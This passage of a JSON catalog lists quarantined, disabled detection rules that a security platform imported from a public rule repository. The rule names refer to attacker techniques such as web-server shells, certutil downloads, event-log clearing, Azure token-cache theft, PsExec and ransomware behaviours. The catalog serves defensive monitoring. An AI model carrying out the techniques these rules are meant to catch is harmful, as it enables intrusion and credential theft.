"chronicle/detection-rules", "source_id": "scarab_ransomware_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/scarab_ransomware_part_2.yaral" } }, { "id": "chronicle-detection-rules-scheduled-task-creation", "type": "detection", "name": "scheduled_task_creation", "description": "scheduled_task_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/scheduled-task-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "scheduled_task_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/scheduled_task_creation.yaral" } }, { "id": "chronicle-detection-rules-schtask-creation-sysmon", "type": "detection", "name": "schtask_creation_sysmon", "description": "schtask_creation_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/schtask-creation-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "schtask_creation_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/schtask_creation__sysmon.yaral" } }, { "id": "chronicle-detection-rules-schtask-from-user-profile-sysmon", "type": "detection", "name": "schtask_from_user_profile_sysmon", "description": "schtask_from_user_profile_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/schtask-from-user-profile-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "schtask_from_user_profile_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/schtask_from_user_profile__sysmon.yaral" } }, { "id": "chronicle-detection-rules-secure-deletion-with-sdelete", "type": "detection", "name": "secure_deletion_with_sdelete", "description": "secure_deletion_with_sdelete", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/secure-deletion-with-sdelete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "secure_deletion_with_sdelete", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/secure_deletion_with_sdelete.yaral" } }, { "id": "chronicle-detection-rules-security-eventlog-cleared", "type": "detection", "name": "security_eventlog_cleared", "description": "security_eventlog_cleared", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/security-eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "security_eventlog_cleared", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/security_eventlog_cleared.yaral" } }, { "id": "chronicle-detection-rules-session-manager-autorun-keys-modification", "type": "detection", "name": "session_manager_autorun_keys_modification", "description": "session_manager_autorun_keys_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/session-manager-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "session_manager_autorun_keys_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/session_manager_autorun_keys_modification.yaral" } }, { "id": "chronicle-detection-rules-sharprdp-execution", "type": "detection", "name": "sharprdp_execution", "description": "sharprdp_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sharprdp-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sharprdp_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/sharprdp_execution.yaral" } }, { "id": "chronicle-detection-rules-shells-spawned-by-web-servers", "type": "detection", "name": "shells_spawned_by_web_servers", "description": "shells_spawned_by_web_servers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/shells-spawned-by-web-servers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "shells_spawned_by_web_servers", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/shells_spawned_by_web_servers.yaral" } }, { "id": "chronicle-detection-rules-shimcache-flush", "type": "detection", "name": "shimcache_flush", "description": "shimcache_flush", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/shimcache-flush.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "shimcache_flush", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/shimcache_flush.yaral" } }, { "id": "chronicle-detection-rules-signal-desktop-app-privilege-escalation", "type": "detection", "name": "signal_desktop_app_privilege_escalation", "description": "signal_desktop_app_privilege_escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/signal-desktop-app-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "signal_desktop_app_privilege_escalation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/signal_desktop_app_privilege_escalation.yaral" } }, { "id": "chronicle-detection-rules-sigred-cve20201350-dns-remote-code-exploit-via-httpproxy-logs", "type": "detection", "name": "sigred_cve20201350_dns_remote_code_exploit_via_httpproxy_logs", "description": "sigred_cve20201350_dns_remote_code_exploit_via_httpproxy_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sigred-cve20201350-dns-remote-code-exploit-via-httpproxy-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sigred_cve20201350_dns_remote_code_exploit_via_httpproxy_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/proxy/sigred__cve_2020_1350_dns_remote_code_exploit__via_http_proxy_logs.yaral" } }, { "id": "chronicle-detection-rules-smbexecpy-service-installation", "type": "detection", "name": "smbexecpy_service_installation", "description": "smbexecpy_service_installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/smbexecpy-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "smbexecpy_service_installation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/smbexec_py_service_installation.yaral" } }, { "id": "chronicle-detection-rules-snatch-ransomware-sysmon-behaviour", "type": "detection", "name": "snatch_ransomware_sysmon_behaviour", "description": "snatch_ransomware_sysmon_behaviour", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/snatch-ransomware-sysmon-behaviour.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "snatch_ransomware_sysmon_behaviour", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/snatch_ransomware__sysmon_behaviour.yaral" } }, { "id": "chronicle-detection-rules-socks-malware-detector-sysmon-behavior-august-2019", "type": "detection", "name": "socks_malware_detector_sysmon_behavior_august_2019", "description": "socks_malware_detector_sysmon_behavior_august_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/socks-malware-detector-sysmon-behavior-august-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "socks_malware_detector_sysmon_behavior_august_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/socks_malware_detector__sysmon_behavior___august_2019.yaral" } }, { "id": "chronicle-detection-rules-sodinokibi-ransomware-detector-sysmon-behaviorjuly-2019", "type": "detection", "name": "sodinokibi_ransomware_detector_sysmon_behaviorjuly_2019", "description": "sodinokibi_ransomware_detector_sysmon_behaviorjuly_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sodinokibi-ransomware-detector-sysmon-behaviorjuly-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sodinokibi_ransomware_detector_sysmon_behaviorjuly_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/sodinokibi_ransomware_detector__sysmon_behavior__july_2019.yaral" } }, { "id": "chronicle-detection-rules-sofacy-apt-c2-domain-communication", "type": "detection", "name": "sofacy__apt_c2_domain_communication", "description": "sofacy__apt_c2_domain_communication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sofacy-apt-c2-domain-communication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sofacy__apt_c2_domain_communication", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/sofacy___apt_c2_domain_communication.yaral" } }, { "id": "chronicle-detection-rules-solarwinds-backdoor-c2-host-name-detected-via-dns", "type": "detection", "name": "solarwinds_backdoor_c2_host_name_detected_via_dns", "description": "solarwinds_backdoor_c2_host_name_detected_via_dns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/solarwinds-backdoor-c2-host-name-detected-via-dns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "solarwinds_backdoor_c2_host_name_detected_via_dns", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/dns/solarwinds_backdoor_c2_host_name_detected___via_dns.yaral" } }, { "id": "chronicle-detection-rules-solarwinds-backdoor-c2-host-name-detected-via-proxy", "type": "detection", "name": "solarwinds_backdoor_c2_host_name_detected_via_proxy", "description": "solarwinds_backdoor_c2_host_name_detected_via_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/solarwinds-backdoor-c2-host-name-detected-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "solarwinds_backdoor_c2_host_name_detected_via_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/solarwinds_backdoor_c2_host_name_detected___via_proxy.yaral" } }, { "id": "chronicle-detection-rules-spear-phishing-attack-on-gov-in-poland-apt28-sysmon", "type": "detection", "name": "spear_phishing_attack_on_gov_in_poland_apt28_sysmon", "description": "spear_phishing_attack_on_gov_in_poland_apt28_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/spear-phishing-attack-on-gov-in-poland-apt28-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "spear_phishing_attack_on_gov_in_poland_apt28_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/spear_phishing_attack_on_gov_in_poland_apt28?__sysmon.yaral" } }, { "id": "chronicle-detection-rules-sticky-key-like-backdoor-usage", "type": "detection", "name": "sticky_key_like_backdoor_usage", "description": "sticky_key_like_backdoor_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sticky-key-like-backdoor-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sticky_key_like_backdoor_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/sticky_key_like_backdoor_usage.yaral" } }, { "id": "chronicle-detection-rules-stop-ransomware-and-vidar-ransomware-detection", "type": "detection", "name": "stop_ransomware_and_vidar_ransomware_detection", "description": "stop_ransomware_and_vidar_ransomware_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/stop-ransomware-and-vidar-ransomware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "stop_ransomware_and_vidar_ransomware_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/stop_ransomware_and_vidar_ransomware_detection.yaral" } }, { "id": "chronicle-detection-rules-strike-network-inventory-explorer-unquoted-service-path", "type": "detection", "name": "strike_network_inventory_explorer__unquoted_service_path", "description": "strike_network_inventory_explorer__unquoted_service_path", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/strike-network-inventory-explorer-unquoted-service-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "strike_network_inventory_explorer__unquoted_service_path", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/10_strike_network_inventory_explorer___unquoted_service_path.yaral" } }, { "id": "chronicle-detection-rules-suspicious-access-to-windows-setup-files", "type": "detection", "name": "suspicious_access_to_windows_setup_files", "description": "suspicious_access_to_windows_setup_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-access-to-windows-setup-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_access_to_windows_setup_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/access_to_windows_setup_files.yaral" } }, { "id": "chronicle-detection-rules-suspicious-asn", "type": "detection", "name": "suspicious_asn", "description": "suspicious_asn", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-asn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_asn", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/network/suspicious_asn.yaral" } }, { "id": "chronicle-detection-rules-suspicious-asn-watchlist", "type": "detection", "name": "suspicious_asn_watchlist", "description": "suspicious_asn_watchlist", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-asn-watchlist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_asn_watchlist", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/network/suspicious_asn_watchlist.yaral" } }, { "id": "chronicle-detection-rules-suspicious-calculator-usage", "type": "detection", "name": "suspicious_calculator_usage", "description": "suspicious_calculator_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-calculator-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_calculator_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_calculator_usage.yaral" } }, { "id": "chronicle-detection-rules-suspicious-certreq-command-to-download", "type": "detection", "name": "suspicious_certreq_command_to_download", "description": "suspicious_certreq_command_to_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-certreq-command-to-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_certreq_command_to_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_certreq_command_to_download.yaral" } }, { "id": "chronicle-detection-rules-suspicious-certutil-command", "type": "detection", "name": "suspicious_certutil_command", "description": "suspicious_certutil_command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-certutil-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_certutil_command", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_certutil_command.yaral" } }, { "id": "chronicle-detection-rules-suspicious-change-in-hosts-file", "type": "detection", "name": "suspicious_change_in_hosts_file", "description": "suspicious_change_in_hosts_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-change-in-hosts-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_change_in_hosts_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/change_in_hosts_file.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-execution", "type": "detection", "name": "suspicious_command_execution", "description": "suspicious_command_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_command_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-line-contains-azure-tokencachedat-as-argument-via-cmdline", "type": "detection", "name": "suspicious_command_line_contains_azure_tokencachedat_as_argument_via_cmdline", "description": "suspicious_command_line_contains_azure_tokencachedat_as_argument_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-line-contains-azure-tokencachedat-as-argument-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_line_contains_azure_tokencachedat_as_argument_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/cloud_security/sysmon/suspicious_command_line_contains_azure_tokencache_dat_as_argument__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-net-user", "type": "detection", "name": "suspicious_command_net_user", "description": "suspicious_command_net_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-net-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_net_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/command_net_user.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-psexec", "type": "detection", "name": "suspicious_command_psexec", "description": "suspicious_command_psexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_psexec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/command_psexec.yaral" } }, { "id": 